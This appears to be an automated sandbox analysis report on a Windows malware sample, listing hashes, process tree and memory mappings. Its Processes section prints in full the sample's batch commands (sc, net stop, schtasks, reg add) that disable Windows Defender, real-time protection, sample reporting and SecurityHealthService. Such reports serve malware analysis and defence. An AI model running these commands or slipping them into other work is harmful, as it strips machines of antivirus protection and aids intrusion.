Analysis
-
max time kernel
91s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
20-05-2022 22:22
Static task
static1
Behavioral task
behavioral1
Sample
15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe
Resource
win7-20220414-en
General
-
Target
15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe
-
Size
269KB
-
MD5
6161cfa4c704ec1eff18ec8af42c72c7
-
SHA1
00bb164985ae6bfab56db839433618d505be5076
-
SHA256
15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693
-
SHA512
8e4bef47649706800034e1275d5882124c8342b0a0fb418c2f5e8ef14a103e8a321a76dde8772eff5da1f2b27cae072f45ac88f79f4ec655cc3670c7b7c1b46f
Malware Config
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.execmd.exenet.exenet.exenet.exenet.exedescription pid process target process PID 4780 wrote to memory of 3452 4780 15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe cmd.exe PID 4780 wrote to memory of 3452 4780 15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe cmd.exe PID 3452 wrote to memory of 4024 3452 cmd.exe sc.exe PID 3452 wrote to memory of 4024 3452 cmd.exe sc.exe PID 3452 wrote to memory of 1428 3452 cmd.exe net.exe PID 3452 wrote to memory of 1428 3452 cmd.exe net.exe PID 1428 wrote to memory of 4440 1428 net.exe net1.exe PID 1428 wrote to memory of 4440 1428 net.exe net1.exe PID 3452 wrote to memory of 2076 3452 cmd.exe sc.exe PID 3452 wrote to memory of 2076 3452 cmd.exe sc.exe PID 3452 wrote to memory of 3752 3452 cmd.exe net.exe PID 3452 wrote to memory of 3752 3452 cmd.exe net.exe PID 3752 wrote to memory of 3312 3752 net.exe net1.exe PID 3752 wrote to memory of 3312 3752 net.exe net1.exe PID 3452 wrote to memory of 4084 3452 cmd.exe sc.exe PID 3452 wrote to memory of 4084 3452 cmd.exe sc.exe PID 3452 wrote to memory of 3528 3452 cmd.exe net.exe PID 3452 wrote to memory of 3528 3452 cmd.exe net.exe PID 3528 wrote to memory of 4160 3528 net.exe net1.exe PID 3528 wrote to memory of 4160 3528 net.exe net1.exe PID 3452 wrote to memory of 4688 3452 cmd.exe sc.exe PID 3452 wrote to memory of 4688 3452 cmd.exe sc.exe PID 3452 wrote to memory of 4128 3452 cmd.exe net.exe PID 3452 wrote to memory of 4128 3452 cmd.exe net.exe PID 4128 wrote to memory of 548 4128 net.exe net1.exe PID 4128 wrote to memory of 548 4128 net.exe net1.exe PID 3452 wrote to memory of 424 3452 cmd.exe schtasks.exe PID 3452 wrote to memory of 424 3452 cmd.exe schtasks.exe PID 3452 wrote to memory of 4572 3452 cmd.exe schtasks.exe PID 3452 wrote to memory of 4572 3452 cmd.exe schtasks.exe PID 3452 wrote to memory of 1224 3452 cmd.exe schtasks.exe PID 3452 wrote to memory of 1224 3452 cmd.exe schtasks.exe PID 3452 wrote to memory of 400 3452 cmd.exe schtasks.exe PID 3452 wrote to memory of 400 3452 cmd.exe schtasks.exe PID 3452 wrote to memory of 1532 3452 cmd.exe reg.exe PID 3452 wrote to memory of 1532 3452 cmd.exe reg.exe PID 3452 wrote to memory of 3524 3452 cmd.exe reg.exe PID 3452 wrote to memory of 3524 3452 cmd.exe reg.exe PID 3452 wrote to memory of 4784 3452 cmd.exe reg.exe PID 3452 wrote to memory of 4784 3452 cmd.exe reg.exe PID 3452 wrote to memory of 2752 3452 cmd.exe reg.exe PID 3452 wrote to memory of 2752 3452 cmd.exe reg.exe PID 3452 wrote to memory of 2876 3452 cmd.exe reg.exe PID 3452 wrote to memory of 2876 3452 cmd.exe reg.exe PID 3452 wrote to memory of 2288 3452 cmd.exe reg.exe PID 3452 wrote to memory of 2288 3452 cmd.exe reg.exe PID 3452 wrote to memory of 228 3452 cmd.exe reg.exe PID 3452 wrote to memory of 228 3452 cmd.exe reg.exe PID 3452 wrote to memory of 4348 3452 cmd.exe reg.exe PID 3452 wrote to memory of 4348 3452 cmd.exe reg.exe PID 3452 wrote to memory of 4964 3452 cmd.exe reg.exe PID 3452 wrote to memory of 4964 3452 cmd.exe reg.exe PID 3452 wrote to memory of 3172 3452 cmd.exe reg.exe PID 3452 wrote to memory of 3172 3452 cmd.exe reg.exe PID 3452 wrote to memory of 4748 3452 cmd.exe reg.exe PID 3452 wrote to memory of 4748 3452 cmd.exe reg.exe PID 3452 wrote to memory of 4764 3452 cmd.exe reg.exe PID 3452 wrote to memory of 4764 3452 cmd.exe reg.exe PID 3452 wrote to memory of 5108 3452 cmd.exe reg.exe PID 3452 wrote to memory of 5108 3452 cmd.exe reg.exe PID 3452 wrote to memory of 3632 3452 cmd.exe reg.exe PID 3452 wrote to memory of 3632 3452 cmd.exe reg.exe PID 3452 wrote to memory of 3508 3452 cmd.exe reg.exe PID 3452 wrote to memory of 3508 3452 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe"C:\Users\Admin\AppData\Local\Temp\15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DC1C.tmp\DC2D.tmp\DC2E.bat C:\Users\Admin\AppData\Local\Temp\15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc config Sense start= disabled3⤵
-
C:\Windows\system32\net.exenet stop Sense3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Sense4⤵
-
C:\Windows\system32\sc.exesc config WdFilter start= disabled3⤵
-
C:\Windows\system32\net.exenet stop WdFilter3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WdFilter4⤵
-
C:\Windows\system32\sc.exesc config WdNisSvc start= disabled3⤵
-
C:\Windows\system32\net.exenet stop WdNisSvc Track3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WdNisSvc Track4⤵
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled3⤵
-
C:\Windows\system32\net.exenet stop WinDefend3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableAntiSpywareRealtimeProtection" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DpaDisabled" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "ProductStatus" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "ManagedDefenderProductType" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "OneTimeSqmDataSent" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Scan" /v "AutomaticallyCleanAfterScan" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t REG_DWORD /d "8" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "AllowNonAdminFunctionality" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\DC1C.tmp\DC2D.tmp\DC2E.batFilesize
3KB
MD5810407dc9da6b1688b552d84e3ff11bf
SHA127166f30e433b396ad96f7bc5cadb95afde66e16
SHA2563cc739dcee739bbff3e609074d488fe108c58dcba7416a4a1941b79bf9d96aa2
SHA512f1d45b73cb7f2145ea50a9aa6aa0f3326d60ffb5d6f7d37b7cfb93864af379e81e5a977aa5c3080313837769eb6223b8efadb84a8d4f99517bf3fbf6e245fdaf
-
memory/228-154-0x0000000000000000-mapping.dmp
-
memory/400-147-0x0000000000000000-mapping.dmp
-
memory/424-144-0x0000000000000000-mapping.dmp
-
memory/548-143-0x0000000000000000-mapping.dmp
-
memory/1040-163-0x0000000000000000-mapping.dmp
-
memory/1224-146-0x0000000000000000-mapping.dmp
-
memory/1428-133-0x0000000000000000-mapping.dmp
-
memory/1532-148-0x0000000000000000-mapping.dmp
-
memory/1796-168-0x0000000000000000-mapping.dmp
-
memory/2076-135-0x0000000000000000-mapping.dmp
-
memory/2288-153-0x0000000000000000-mapping.dmp
-
memory/2300-171-0x0000000000000000-mapping.dmp
-
memory/2752-151-0x0000000000000000-mapping.dmp
-
memory/2876-152-0x0000000000000000-mapping.dmp
-
memory/2952-170-0x0000000000000000-mapping.dmp
-
memory/3172-157-0x0000000000000000-mapping.dmp
-
memory/3312-137-0x0000000000000000-mapping.dmp
-
memory/3452-130-0x0000000000000000-mapping.dmp
-
memory/3468-172-0x0000000000000000-mapping.dmp
-
memory/3508-162-0x0000000000000000-mapping.dmp
-
memory/3524-149-0x0000000000000000-mapping.dmp
-
memory/3528-139-0x0000000000000000-mapping.dmp
-
memory/3536-164-0x0000000000000000-mapping.dmp
-
memory/3632-161-0x0000000000000000-mapping.dmp
-
memory/3752-136-0x0000000000000000-mapping.dmp
-
memory/4024-132-0x0000000000000000-mapping.dmp
-
memory/4084-138-0x0000000000000000-mapping.dmp
-
memory/4128-142-0x0000000000000000-mapping.dmp
-
memory/4160-140-0x0000000000000000-mapping.dmp
-
memory/4288-166-0x0000000000000000-mapping.dmp
-
memory/4348-155-0x0000000000000000-mapping.dmp
-
memory/4440-134-0x0000000000000000-mapping.dmp
-
memory/4484-167-0x0000000000000000-mapping.dmp
-
memory/4512-165-0x0000000000000000-mapping.dmp
-
memory/4572-145-0x0000000000000000-mapping.dmp
-
memory/4688-141-0x0000000000000000-mapping.dmp
-
memory/4748-158-0x0000000000000000-mapping.dmp
-
memory/4764-159-0x0000000000000000-mapping.dmp
-
memory/4784-150-0x0000000000000000-mapping.dmp
-
memory/4964-156-0x0000000000000000-mapping.dmp
-
memory/4992-169-0x0000000000000000-mapping.dmp
-
memory/5108-160-0x0000000000000000-mapping.dmp